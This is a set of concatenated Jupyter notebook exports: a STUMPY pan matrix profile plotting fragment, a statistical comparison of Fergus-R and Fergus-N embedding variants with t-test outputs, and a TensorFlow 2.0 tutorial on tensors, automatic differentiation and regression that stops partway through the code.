plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMP
###Code
min_m, max_m = 100, 3000
steam = stumpy.stimp(steam_df['steam flow'], min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
for _ in range(2 * n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Bonus Section
###Code
%matplotlib widget
plt.style.use('https://raw.githubusercontent.com/TDAmeritrade/stumpy/main/docs/stumpy.mplstyle')
plt.ioff()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
plt.ion()
ax = plt.gca()
ax.format_coord = lambda x, y: f'Time = {x:.0f}, m = {y:.0f}'
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
def update_slider(change):
PAN = steam.pan(threshold=change['new'])
im.set_data(PAN)
fig.canvas.draw_idle()
threshold = 0.2
slider = widgets.FloatSlider(value=threshold, min=0.0, max=1.0, step=0.01, readout_format='.2f', layout=Layout(width='80%'), description='Threshold:')
slider.observe(update_slider, names='value')
widgets.VBox([fig.canvas, slider])
###Output
_____no_output_____ |
ipython_notebooks/coling2016-classification-results.ipynb | ###Markdown
Classification resultsIn the following sections, each comparison is presented: Fergus-Recurrent vs Fergus-Neuralized Fergus-R Convolutional vs Fergus-N Convolutional> Question: is R better than N with convolutional embeddings? Fergus-R Token vs Fergus-N Token > Question: is R better than N with token embeddings? Fergus-R Minimal Token vs Fergus-N Minimal Token > Question: is R better than N with minimal token embeddings?-------- Convolutional vs Token vs Minimal Token Embeddings-------- Fergus-R Convolutional vs Fergus-R Token> Question: are convolutions better in the R model? Fergus-N Convolutional vs Fergus-N Token > Question: are convolutions better in the N model?
###Code
from sqlitedict import SqliteDict
import sys
import os
import numpy as np
import pandas as pd
import scipy.stats
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set_style('whitegrid')
ROOT = '/home/cogniton/research/code/paper_repos/coling_2016'
sys.path.append(ROOT)
import fergus
"""
Stats parsing and comparison functions
"""
def parse_stats(stats, version):
assert version == 'before_astar' or version == 'after_astar'
out = []
for datum_index, datum in sorted(stats.items()):
new_datum = {'datum_index': datum_index,
'time': datum['time'],
'length': datum['length'],
'version': version}
for stat_type, binary_data in datum[version].items():
new_datum[stat_type] = float(sum(binary_data))/len(binary_data)
out.append(new_datum)
return pd.DataFrame(out)
def load_data(db_name, tablename='tagged_data', root_path=''):
import os
db_name = os.path.join(root_path, db_name)
with SqliteDict(db_name, tablename=tablename) as db:
data = db.items()
print(len(data))
stats = {int(d):datum[-1] for d, datum in data}
return pd.concat([parse_stats(stats, 'before_astar'),
parse_stats(stats, 'after_astar')])
def ttest_rel(df1, df2, stat_name, data_version, ax=None):
df1 = df1[df1.version==data_version]
df2 = df2[df2.version==data_version]
shared_indices = set(df1.datum_index).intersection(df2.datum_index)
df1_subset = df1[df1.datum_index.isin(shared_indices)][stat_name]
df2_subset = df2[df2.datum_index.isin(shared_indices)][stat_name]
ttest = scipy.stats.ttest_rel(df1_subset, df2_subset)
return ttest, df1_subset, df2_subset
def pretty_compare(model1, model2, model1_name, model2_name,
embedding1_name, embedding2_name, data_version):
print("{}-{} vs {}-{} embeddings {}".format(model1_name,
embedding1_name,
model2_name,
embedding2_name,
data_version))
print("="*30)
stat_keys = [('correct', 'mean'), ('time', 'median')]
func_map = {'mean': lambda x: np.mean(x), 'median': lambda x: np.median(x)}
fig, axes = plt.subplots(len(stat_keys), 1, figsize=(10,15))
for i, (stat_type, stat_functype) in enumerate(stat_keys):
n_dash = (20-len(stat_type))//2
print("{:^20}".format("-"*n_dash+stat_type+"-"*n_dash))
(stat,
m1subset, m2subset) = ttest_rel(model1, model2, stat_type, data_version)
format1 = "{}-{}".format(model1_name, embedding1_name)
format2 = "{}-{}".format(model2_name, embedding2_name)
model1_stat = func_map[stat_functype](m1subset)
model2_stat = func_map[stat_functype](m2subset)
print("\t{:<30} = {:0.4f}".format("{} {}".format(format1,stat_functype),
model1_stat))
print("\t{:<30} = {:0.4f}".format("{} {}".format(format2,stat_functype),
model2_stat))
print("\t pvalue = {}".format(stat.pvalue))
print("{:^20}\n".format("-"*15))
axes[i].hist(m1subset, bins=30, color='blue', alpha=0.5,
label=format1)
axes[i].hist(m2subset, bins=30, color='red', alpha=0.5,
label=format2)
axes[i].set_xlabel(stat_type, size=14)
axes[i].legend(loc=2)
plt.tight_layout()
plt.subplots_adjust(top=0.95)
plt.suptitle(data_version, size=18)
data_root = os.path.join(fergus.ROOTPATH, '../data')
fr_conv = load_data('fergusr_convolutional_test.db', root_path=data_root)
fr_token = load_data('fergusr_token_test.db', root_path=data_root)
fr_mintoken = load_data('fergusr_minimaltoken_test.db', root_path=data_root)
fn_conv = load_data('fergusn_convolutional_test.db', root_path=data_root)
fn_token = load_data('fergusn_token_test.db', root_path=data_root)
fn_mintoken = load_data('fergusn_minimaltoken_test.db', root_path=data_root)
'''
this compares the recurrent vs the neuralized model
with convolutional embeddings
'''
pretty_compare(fr_conv, fn_conv, "Fergus-R", "Fergus-N",
"Convolutional", "Convolutional",
"before_astar")
pretty_compare(fr_conv, fn_conv, "Fergus-R", "Fergus-N",
"Convolutional", "Convolutional",
"after_astar")
'''
this compares the recurrent model vs the neuralized model
with token embeddings
'''
pretty_compare(fr_token, fn_token, "Fergus-R", "Fergus-N",
"Token", "Token", "before_astar")
pretty_compare(fr_token, fn_token, "Fergus-R", "Fergus-N",
"Token", "Token", "after_astar")
'''
this compares the recurrent model vs the neuralized model
with minimal token embeddings
'''
pretty_compare(fr_mintoken, fn_mintoken, "Fergus-R", "Fergus-N",
"Minimal Token", "Minimal Token", "before_astar")
pretty_compare(fr_mintoken, fn_mintoken, "Fergus-R", "Fergus-N",
"Minimal Token", "Minimal Token", "after_astar")
'''
this is comparing the recurrent model with each embedding type
'''
pretty_compare(fr_conv, fr_token, "Fergus-R", "Fergus-R",
"Convolutional", "Token", "before_astar")
pretty_compare(fr_conv, fr_token, "Fergus-R", "Fergus-R",
"Convolutional", "Token", "after_astar")
pretty_compare(fr_conv, fr_mintoken, "Fergus-R", "Fergus-R",
"Convolutional", "Minimal Token", "before_astar")
pretty_compare(fr_conv, fr_mintoken, "Fergus-R", "Fergus-R",
"Convolutional", "Minimal Token", "after_astar")
pretty_compare(fr_token, fr_mintoken, "Fergus-R", "Fergus-R",
"Token", "Minimal Token", "before_astar")
pretty_compare(fr_token, fr_mintoken, "Fergus-R", "Fergus-R",
"Token", "Minimal Token", "after_astar")
'''
this compares the neuralized model with convolutional or token embeddings
'''
pretty_compare(fn_conv, fn_token, "Fergus-N", "Fergus-N",
"Convolutional", "Token", "before_astar")
pretty_compare(fn_conv, fn_token, "Fergus-N", "Fergus-N",
"Convolutional", "Token", "after_astar")
pretty_compare(fn_conv, fn_mintoken, "Fergus-N", "Fergus-N",
"Convolutional", "Minimal Token", "before_astar")
pretty_compare(fn_conv, fn_mintoken, "Fergus-N", "Fergus-N",
"Convolutional", "Minimal Token", "after_astar")
pretty_compare(fn_token, fn_mintoken, "Fergus-N", "Fergus-N",
"Token", "Minimal Token", "before_astar")
pretty_compare(fn_token, fn_mintoken, "Fergus-N", "Fergus-N",
"Token", "Minimal Token", "after_astar")
###Output
Fergus-N-Convolutional vs Fergus-N-Token embeddings before_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5811
Fergus-N-Token mean = 0.6069
pvalue = 1.38815047814e-27
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Token median = 1.8054
pvalue = 1.51107029427e-96
---------------
Fergus-N-Convolutional vs Fergus-N-Token embeddings after_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5735
Fergus-N-Token mean = 0.5563
pvalue = 7.48773714641e-12
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Token median = 1.8054
pvalue = 1.51107029427e-96
---------------
Fergus-N-Convolutional vs Fergus-N-Minimal Token embeddings before_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5811
Fergus-N-Minimal Token mean = 0.5209
pvalue = 1.4282183734e-120
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Minimal Token median = 2.0236
pvalue = 1.11420165606e-33
---------------
Fergus-N-Convolutional vs Fergus-N-Minimal Token embeddings after_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5735
Fergus-N-Minimal Token mean = 0.5418
pvalue = 4.7182012581e-38
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Minimal Token median = 2.0236
pvalue = 1.11420165606e-33
---------------
Fergus-N-Token vs Fergus-N-Minimal Token embeddings before_astar
==============================
------correct------
Fergus-N-Token mean = 0.6069
Fergus-N-Minimal Token mean = 0.5209
pvalue = 1.47657277542e-230
---------------
--------time--------
Fergus-N-Token median = 1.8054
Fergus-N-Minimal Token median = 2.0236
pvalue = 5.3095725502e-174
---------------
Fergus-N-Token vs Fergus-N-Minimal Token embeddings after_astar
==============================
------correct------
Fergus-N-Token mean = 0.5563
Fergus-N-Minimal Token mean = 0.5418
pvalue = 2.28499928272e-09
---------------
--------time--------
Fergus-N-Token median = 1.8054
Fergus-N-Minimal Token median = 2.0236
pvalue = 5.3095725502e-174
---------------
|
section_5/5-1.ipynb | ###Markdown
Working with Tensorflow 2.0[**TensorFlow**](https://www.tensorflow.org/) is an end-to-end open source platform for machine learning. It has a comprehensive, flexible ecosystem of tools, libraries, and community resources that lets researchers push the state of the art in ML and lets developers easily build and deploy ML-powered applications.The TensorFlow library is a free and open-source software library for *dataflow programming* (models a program as a directed graph of the data flowing between operations, thus implementing dataflow principles and architecture) and *differentiable programming* (programs can be differentiated throughout, usually via automatic differentiation; this allows for gradient-based optimization of parameters in the program, often via gradient descent) across a range of tasks. It is a symbolic math library, and is also used for machine learning applications such as neural networks. It is used for both research and production at Google.TensorFlow was originally developed by researchers and engineers working on the Google Brain team within Google's Machine Intelligence Research organization to conduct machine learning and deep neural networks research. The system is general enough to be applicable in a wide variety of other domains as well. It is one of the most popular libraries for machine learning with neural networks.TensorFlow provides stable Python and C++ APIs, as well as a non-guaranteed, backward-compatible API for other languages. Tensorflow tensorsA [tensor](https://www.tensorflow.org/guide/tensor) is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes (similar to `numpy.ndarray`).When we write a TensorFlow program, we mainly operate on and pass around `tf.Tensor` objects, each of which represents a partially defined data object that will eventually produce a value. In a TensorFlow program, we specify how these `tf.Tensor`s link into a computation graph. We can then run the computation graph to get the output (based on an input), and use differential properties of the graph to optimize the parameters (`tf.Tensor` nodes) in the program. `tf.Tensor`s can reside in GPU or CPU memory. TensorFlow supports a rich library of operations (`tf.add`, `tf.matmul`, `tf.linalg.inv`, etc.) that consume and produce `tf.Tensor`s. These operations also automatically convert native Python types to tensors.
###Code
import tensorflow as tf
print("TensorFlow version : {}\n\n".format(tf.__version__))
print(tf.add(1, 3))
print(tf.add([2, 3], [6, 6]))
print(tf.square(2))
print(tf.reduce_sum([4, 3, 2]))
# Operator overloading is also supported
print(tf.square(3) + tf.square(2))
###Output
TensorFlow version : 2.1.0
tf.Tensor(4, shape=(), dtype=int32)
tf.Tensor([8 9], shape=(2,), dtype=int32)
tf.Tensor(4, shape=(), dtype=int32)
tf.Tensor(9, shape=(), dtype=int32)
tf.Tensor(13, shape=(), dtype=int32)
###Markdown
Each `tf.Tensor` has a datatype and a shape
###Code
x = tf.constant([[4, 3]])
print(x)
print(x.shape)
print(x.dtype)
###Output
tf.Tensor([[4 3]], shape=(1, 2), dtype=int32)
(1, 2)
<dtype: 'int32'>
###Markdown
Tensors differ from numpy arrays in that they are *immutable* and can be computed and stored on the GPU or CPU. However, it is easy to convert from a `tf.Tensor` to a `np.ndarray`, and TensorFlow automatically converts numpy arrays to `tf.Tensor`s.
###Code
import numpy as np
ndarray = np.array([[1, 2], [3, 4]])
# Tensorflow converts ndarray to a tensor after an operation
tensor = tf.multiply(ndarray, 2)
print('Tensor :\n', tensor)
# Tensorflow converts ndarray to a tensor after operator overloading operation
tensor = tf.constant(2) * ndarray
print('\nTensor :\n', tensor)
# Numpy can convert a tensor to a numpy ndarray
numpy_array = np.multiply(tensor, 2)
print('\nNumpy ndarray :\n', numpy_array)
# It does this by calling the .numpy() method explicity
print('\nNumpy ndarray : \n', tensor.numpy())
###Output
Tensor :
tf.Tensor(
[[2 4]
[6 8]], shape=(2, 2), dtype=int64)
Tensor :
tf.Tensor(
[[2 4]
[6 8]], shape=(2, 2), dtype=int32)
Numpy ndarray :
[[ 4 8]
[12 16]]
Numpy ndarray :
[[2 4]
[6 8]]
###Markdown
We can also index tensors with the same convention as numpy.
###Code
print(tensor[0, 0])
print('\n', tensor[:, 1])
###Output
tf.Tensor(2, shape=(), dtype=int32)
tf.Tensor([4 8], shape=(2,), dtype=int32)
###Markdown
TensorFlow operations can be accelerated by running them in parallel on a GPU. By default, TensorFlow automatically decides whether to use the GPU or CPU for an operation (copying the tensor between them if necessary).
###Code
x = tf.random.uniform([4, 4])
print("List if there is a GPU available : ",
tf.config.experimental.list_physical_devices("GPU"))
print("\nIs the Tensor on GPU #0: ", x.device.endswith('GPU:0'))
###Output
List if there is a GPU available : []
Is the Tensor on GPU #0: False
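###Markdown
Device placement can also be pinned explicitly with a `tf.device` context. A small sketch (the `'/CPU:0'` string is always valid; use `'/GPU:0'` only if a GPU was listed above):
###Code
# Sketch: force operations onto a specific device with a tf.device context.
with tf.device('/CPU:0'):
    a = tf.random.uniform([1000, 1000])
    b = tf.random.uniform([1000, 1000])
    c = tf.matmul(a, b)
print("Result was placed on:", c.device)
###Output
_____no_output_____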
###Markdown
A `tf.Tensor` has a single data type `tf.DType` (e.g. `int32`, `float32`, `string`) shared by all of its elements. There are some special types of tensors, such as `tf.Variable`, `tf.constant`, `tf.SparseTensor` and (in TF 1.x) `tf.placeholder`. The data of a tensor is immutable, meaning that in a single run of the graph the data doesn't change. Depending on the dimension of the tensor, we get the following:

|Dimension|Classical mathematical form|
|---|---|
| 0 | Scalar |
| 1 | Vector |
| 2 | Matrix |
| 3 | 3-Tensor |
| n | n-Tensor |

A variable, i.e. `tf.Variable`, is the best way to represent shared state, and its value can be changed by running operations on it. Higher-level libraries like `keras` use `tf.Variable`s to store model parameters.
###Code
zeros = tf.Variable(tf.zeros([2, 3]))
print(zeros)
scalar = tf.Variable(5)
print('\n', scalar)
# To assign a value to an already set variable we use the .assign() method
scalar.assign(4)
print('\n', scalar)
# We can also explicitly read a value using the .read_value() method
print('\n', scalar.read_value())
###Output
<tf.Variable 'Variable:0' shape=(2, 3) dtype=float32, numpy=
array([[0., 0., 0.],
[0., 0., 0.]], dtype=float32)>
<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=5>
<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=4>
tf.Tensor(4, shape=(), dtype=int32)
###Markdown
Eager executionA very useful feature in TensorFlow 2.0, enabled by default, is *eager execution*, which is an imperative programming environment that evaluates operations immediately, without building graphs: operations return concrete values rather than constructing a computational graph to run later. This makes it easy to start working with TensorFlow and to debug models. It also allows the use of Python data structures, flexibility in how we structure our code, and the use of Python control flow, and it supports GPU operations as well.
###Code
print('Tensorflow {}, executing early by default\nAre we evaluating operations immediately ? : {}'.format(
tf.__version__, tf.executing_eagerly()))
# When we run Tensorflow operations the result is immediately returned
x = tf.constant(2, name='x')
y = tf.constant(3, name='y')
z = x * y
print('z = {}\n As'.format(z))
print('z = {} = x ({}) * y ({})'.format(z, x, y))
# Visualise the computation graph
# The function to be traced.
@tf.function
def my_func(x, y):
# A simple hand-rolled layer.
return x*y
# Set up logging.
from datetime import datetime
stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
logdir = 'logs/func/%s' % stamp
writer = tf.summary.create_file_writer(logdir)
# Sample data for your function.
x = tf.constant(2, name='x')
y = tf.constant(3, name='y')
# Bracket the function call with
# tf.summary.trace_on() and tf.summary.trace_export().
tf.summary.trace_on(graph=True, profiler=True)
# Call only one tf.function when tracing.
z = my_func(x, y)
with writer.as_default():
tf.summary.trace_export(
name="my_func_trace",
step=0,
profiler_outdir=logdir)
print('z = {} = x ({}) * y ({})'.format(z, x, y))
%load_ext tensorboard
%tensorboard --logdir logs/func
###Output
z = 6 = x (2) * y (3)
###Markdown
Automatic differentiation[Automatic differentiation](https://www.wikiwand.com/en/Automatic_differentiation) (AD) is a set of techniques to numerically evaluate the derivative of a function specified by a computer program. AD exploits the fact that every computer program, no matter how complicated, executes a sequence of elementary arithmetic operations (addition, subtraction, multiplication, division, etc.) and elementary functions (exp, log, sin, cos, etc.). By applying the chain rule repeatedly to these operations, derivatives of arbitrary order can be computed automatically, accurately to working precision, and using at most a small constant factor more arithmetic operations than the original program. The chain rule, forward and reverse accumulationFundamental to AD is the decomposition of differentials provided by the chain rule. For the simple composition $$\begin{align}y &= f(g(h(x))) = f(g(h(w_0))) = f(g(w_1)) = f(w_2) = w_3 \\w_0 &= x \\ w_1 &= h(w_0) \\w_2 &= g(w_1) \\w_3 &= f(w_2) = y\end{align}$$the chain rule gives$$\frac{dy}{dx} = \frac{dy}{dw_2} \frac{dw_2}{dw_1} \frac{dw_1}{dx}$$Usually, two distinct modes of AD are presented, *forward accumulation* (or *forward mode*) and *reverse accumulation* (or *reverse mode*). Forward accumulation specifies that one traverses the chain rule from inside to outside (that is, first compute $dw_1/dx$ and then $dw_2/dw_1$ and at last $dy/dw_2$), while reverse accumulation has the traversal from outside to inside (first compute $dy/dw_2$ and then $dw_2/dw_1$ and at last $dw_1/dx$). More succinctly,1. *forward accumulation* computes the recursive relation: $\frac{dw_i}{dx} = \frac{dw_i}{dw_{i-1}} \frac{dw_{i-1}}{dx}$ with $w_3 = y$, and,2. *reverse accumulation* computes the recursive relation: $\frac{dy}{dw_i} = \frac{dy}{dw_{i+1}} \frac{dw_{i+1}}{dw_{i}}$ with $w_0 = x$.Generally, both forward and reverse accumulation are specific manifestations of applying the operator of program composition, fixing the appropriate one of the two mappings $(w,y)$. Tensorflow uses *reverse accumulation*. Reverse accumulationIn reverse accumulation AD, the *dependent variable* to be differentiated is fixed and the derivative is computed *with respect to* each sub-expression recursively. In a pen-and-paper calculation, the derivative of the *outer* functions is repeatedly substituted in the chain rule:$$\frac{\partial y}{\partial x}= \frac{\partial y}{\partial w_1} \frac{\partial w_1}{\partial x}= \left(\frac{\partial y}{\partial w_2} \frac{\partial w_2}{\partial w_1}\right) \frac{\partial w_1}{\partial x}= \left(\left(\frac{\partial y}{\partial w_3} \frac{\partial w_3}{\partial w_2}\right) \frac{\partial w_2}{\partial w_1}\right) \frac{\partial w_1}{\partial x}= \cdots$$In reverse accumulation, the quantity of interest is the *adjoint*, denoted with a bar ($w̄$); it is a derivative of a chosen dependent variable with respect to a subexpression $w$:$\bar w = \frac{\partial y}{\partial w}$[[2](https://en.wikipedia.org/wiki/File:ForwardAccumulationAutomaticDifferentiation.png)]Reverse accumulation traverses the chain rule from outside to inside, or in the case of the computational graph in the diagram, from top to bottom. 
The example function is scalar-valued, and thus there is only one seed for the derivative computation, and only one sweep of the computational graph is needed to calculate the (two-component) gradient.This is only half the work when compared to forward accumulation, but reverse accumulation requires the storage of the intermediate variables $w_i$ as well as the instructions that produced them in a data structure known as a Wengert list (or "tape") which may consume significant memory if the computational graph is large.This can be mitigated to some extent by storing only a subset of the intermediate variables and then reconstructing the necessary work variables by repeating the evaluations, a technique known as rematerialization. Checkpointing is also used to save intermediary states (Tensorflow supports checkpointing).The operations to compute the derivative using reverse accumulation are shown in the table below (note the reversed order):$$\begin{array}{l}\text{Operations to compute derivative}\\ \hline\bar w_5 = 1 \text{ (seed)}\\\bar w_4 = \bar w_5\\\bar w_3 = \bar w_5\\\bar w_2 = \bar w_3 \cdot w_1\\\bar w_1 = \bar w_3 \cdot w_2 + \bar w_4 \cdot \cos w_1\end{array}$$The data flow graph of a computation can be manipulated to calculate the gradient of its original calculation. This is done by adding an adjoint node for each primal node, connected by adjoint edges which parallel the primal edges but flow in the opposite direction. The nodes in the adjoint graph represent multiplication by the derivatives of the functions calculated by the nodes in the primal. For instance, addition in the primal causes fanout in the adjoint; fanout in the primal causes addition in the adjoint. In terms of weight matrices, the adjoint is the transpose. Addition is the covector $[1 \cdots 1]$, since $[1 \cdots 1]\left[\begin{smallmatrix}x_1 \\ \vdots \\ x_n \end{smallmatrix}\right] = x_1 + \cdots + x_n,$ and fanout is the vector $\left[\begin{smallmatrix}1 \\ \vdots \\ 1 \end{smallmatrix}\right],$ since $\left[\begin{smallmatrix}1 \\ \vdots \\ 1 \end{smallmatrix}\right][x] = \left[\begin{smallmatrix}x \\ \vdots \\ x \end{smallmatrix}\right].$ A unary function $y=f(x)$ in the primal causes $x̄=ȳf′(x)$ in the adjoint; etc.Reverse accumulation is more efficient than forward accumulation for functions $f : ℝ^{n} → ℝ^{m}$ with $m ≪ n$ as only $m$ sweeps are necessary, compared to $n$ sweeps for forward accumulation.Reverse mode AD was first published in 1976 by Seppo Linnainmaa.Backpropagation of errors in multilayer perceptrons, a technique used in machine learning, is a special case of reverse mode AD. AD and Gradient Tape in TensorFlowThe `tf.GradientTape` records operations for automatic differentiation, computing the gradient of a computation with respect to its inputs. Operations are recorded if they are executed within this context manager and at least one of their inputs is being "watched". Tensorflow then uses that tape and the gradients associated with each recorded operation to compute the gradients of a "recorded" computation using *reverse accumulation* (explained above).E.g. suppose we have the function$$ y = x^2 $$We can compute analytically $\frac{dy}{dx}$ $$\frac{dy}{dx}=2x$$
###Code
x = tf.constant(5.0)
with tf.GradientTape() as t:
t.watch(x)
y = x * x
dy_dx = t.gradient(y, x)
print('dy_dx : ', dy_dx)
x = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
with tf.GradientTape() as t:
t.watch(x)
k = tf.matmul(x, x)
y = tf.add(k, tf.ones((2, 2)))
dy_dk = t.gradient(y, k)
print('dy_dk : ', dy_dk)
x = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
with tf.GradientTape(persistent=True) as t:
t.watch(x)
k = tf.matmul(x, x)
y = tf.add(k, tf.ones((2, 2)))
dy_dk = t.gradient(y, k)
dy_dx = t.gradient(y, x)
del t  # Drop the reference to the tape when finished with it
print('dy_dk : ', dy_dk)
print('dy_dx : ', dy_dx)
###Output
dy_dk : tf.Tensor(
[[ 7. 11.]
[ 9. 13.]], shape=(2, 2), dtype=float32)
dy_dx : tf.Tensor(
[[ 7. 11.]
[ 9. 13.]], shape=(2, 2), dtype=float32)
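###Markdown
As a quick cross-check (a sketch added for illustration, not part of the original notebook), the adjoint table above corresponds to the two-variable example $y = w_1 w_2 + \sin(w_1)$, so we expect $\partial y/\partial w_1 = w_2 + \cos(w_1)$ and $\partial y/\partial w_2 = w_1$. `tf.GradientTape` reproduces exactly these adjoints (the names `w1`, `w2` below are just illustrative):
###Code
# Sketch: verify the reverse-accumulation example y = w1*w2 + sin(w1)
w1 = tf.constant(2.0)
w2 = tf.constant(3.0)
with tf.GradientTape() as t:
    t.watch([w1, w2])
    y = w1 * w2 + tf.sin(w1)
dy_dw1, dy_dw2 = t.gradient(y, [w1, w2])
print('dy/dw1 =', dy_dw1.numpy(), ', expected w2 + cos(w1) =', (w2 + tf.cos(w1)).numpy())
print('dy/dw2 =', dy_dw2.numpy(), ', expected w1 =', w1.numpy())
###Output
_____no_output_____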
###Markdown
Tapes record operations as they execute, so they naturally handle Python control flow, such as `if` and `while`
###Code
def f(x, y):
output = 6.0
for i in range(y):
if i > 2 and i < 6:
output = tf.multiply(output, x)
return output
def grad(x, y):
with tf.GradientTape() as t:
t.watch(x)
out = f(x, y)
return t.gradient(out, x)
x = tf.Variable(2.0)
print(grad(x, 6))
print(grad(x, 5))
print(grad(x, 4))
x = tf.constant(3.0)
with tf.GradientTape() as g:
g.watch(x)
with tf.GradientTape() as gg:
gg.watch(x)
y = x * x
dy_dx = gg.gradient(y, x)
d2y_dx2 = g.gradient(dy_dx, x)
###Output
_____no_output_____
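###Markdown
The cell above computes the first and second derivatives with nested tapes but never displays them. As a quick check (a small sketch, not in the original notebook), for $y = x^2$ at $x = 3$ we expect $dy/dx = 6$ and $d^2y/dx^2 = 2$:
###Code
# Sketch: print the nested-tape results computed above (dy_dx and d2y_dx2).
print('dy/dx   =', dy_dx.numpy())    # expect 2*x = 6.0
print('d2y/dx2 =', d2y_dx2.numpy())  # expect 2.0
###Output
_____no_output_____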
###Markdown
Ridge Regression with TensorFlowRecall that we looked at ridge regression in section 2, to recap:https://en.wikipedia.org/wiki/Tikhonov_regularization$y_i=w^\mathsf{T}x_i$ where $w\in{\rm I\!R}^{n}$, i.e. if the dimension is $n=2$; $y_{i} = f(x_{i}) = \begin{bmatrix} w_{0}, w_{1} \end{bmatrix} \begin{bmatrix} x_{0} \\ x_{1} \end{bmatrix} = w_{0}x_{0} + w_{1}x_{1}$Model : $\hat{y}=\mathbf{X}w$Cost function : $$ J(w)= \sum_i (w^\mathsf{T} x_i - y_i)^2 = {\bf ||} \mathbf{X} w-y {\bf ||}^2_{2} $$$$\min_{w} \, (\mathbf{y} - \mathbf{X} w)^\mathsf{T}(\mathbf{y} - \mathbf{X} w) $$Setting the gradient to zero,$$\frac{\partial (\mathbf{y} - \mathbf{X} w)^\mathsf{T}(\mathbf{y} - \mathbf{X} w)}{\partial w}=-2\mathbf{X}^\mathsf{T}(y-\mathbf{X} w) = 0$$gives the normal equations$$\mathbf{X}^\mathsf{T}\mathbf{X} w=\mathbf{X}^\mathsf{T} y$$ Solution with the Analytic (Exact algebraic solution)i.e. the analytical solution for the model parameters is to compute :$$w = (\mathbf{X}^\mathsf{T}\mathbf{X})^{-1}\mathbf{X}^\mathsf{T} y = \mathbf{X}^{+} y$$where $\mathbf{X}^{+}$ is the Moore–Penrose pseudo-inverse of $\mathbf{X}$ (computed below with `tf.linalg.pinv`).
###Code
# Recall the Ridge Regression example from section 2-2
import matplotlib.pyplot as plt
from sklearn import datasets
digits = datasets.load_digits()
(X, y) = datasets.load_digits(return_X_y=True)
# Split the labelled dataset into a training set and test set
index_to_split = -1
X_train = X[:index_to_split]
y_train = np.array([y[:index_to_split]])
X_test = X[index_to_split:]
y_test = np.array([y[index_to_split:]])
# Calculate the analytical solution
X_train_inv = tf.linalg.pinv(X_train)
y_train = tf.transpose(tf.Variable(y_train, dtype=tf.float64))
w = tf.matmul(X_train_inv, y_train)
print('w: {}'.format(w.numpy().flatten()))
# Test the model
y_hat = X_test @ w
print(y_hat)
print(w.shape)
print('y_hat: {}, rounds to {}'.format(y_hat, np.round(y_hat).item(0)))
print('Actual y label: {}'.format(y_test))
plt.figure()
plt.imshow(16 - digits.images[-1], cmap='gray')
plt.show()
###Output
y_hat: [[9.30939946]], rounds to 9.0
Actual y label: [[8]]
###Markdown
Solution with Batch Gradient Descent (Using TensorFlow)Let's train the ridge regression model this time using gradient descent. Recall the cost function is :$$ J(w)= \sum_i (w^\mathsf{T} x_i - y_i)^2 = {\bf ||} \mathbf{X} w-y {\bf ||}^2_{2} $$with gradient$$\frac{\partial J(w)}{\partial w} = -2\mathbf{X}^\mathsf{T}(y-\mathbf{X} w)$$Our update equation for $w$ is $$ w \leftarrow w - \eta \frac{\partial J(\mathbf{w})}{\partial \mathbf{w}} $$We will use `tf.Variable`'s to represent the parameters of the model, and we can use `tf` methods such as `assign_sub` to read and update the stored value. These are mutable in the TensorFlow computation graph. We will do the following:1. Define the model2. Define a loss function3. Train using the training data and use an *optimizer* to adjust the variables to fit the dataTo recap our model is : $\hat{y}=\mathbf{X}w$
###Code
# 1. Defining our model
class RidgeRegression(object):
def __init__(self):
# Intialise parameter values
self.w = tf.Variable(tf.random.normal(
[64, 1], stddev=0.1, dtype=tf.float64, seed=0))
# Actual model
def __call__(self, X):
return X @ self.w
# 2. Define the loss function
def loss(target_y, predicted_y):
return tf.reduce_mean(tf.square(predicted_y - target_y))
# 3. Using gradient descent define a training function
def train(ridge_regression, train_X, train_y, learning_rate):
with tf.GradientTape() as t:
t.watch(ridge_regression.w)
current_loss = loss(train_y, ridge_regression(train_X))
dw = t.gradient(current_loss, ridge_regression.w)
ridge_regression.w.assign_add(- learning_rate * dw)
# # Putting it all together on the digits dataset
ridge_regression = RidgeRegression()
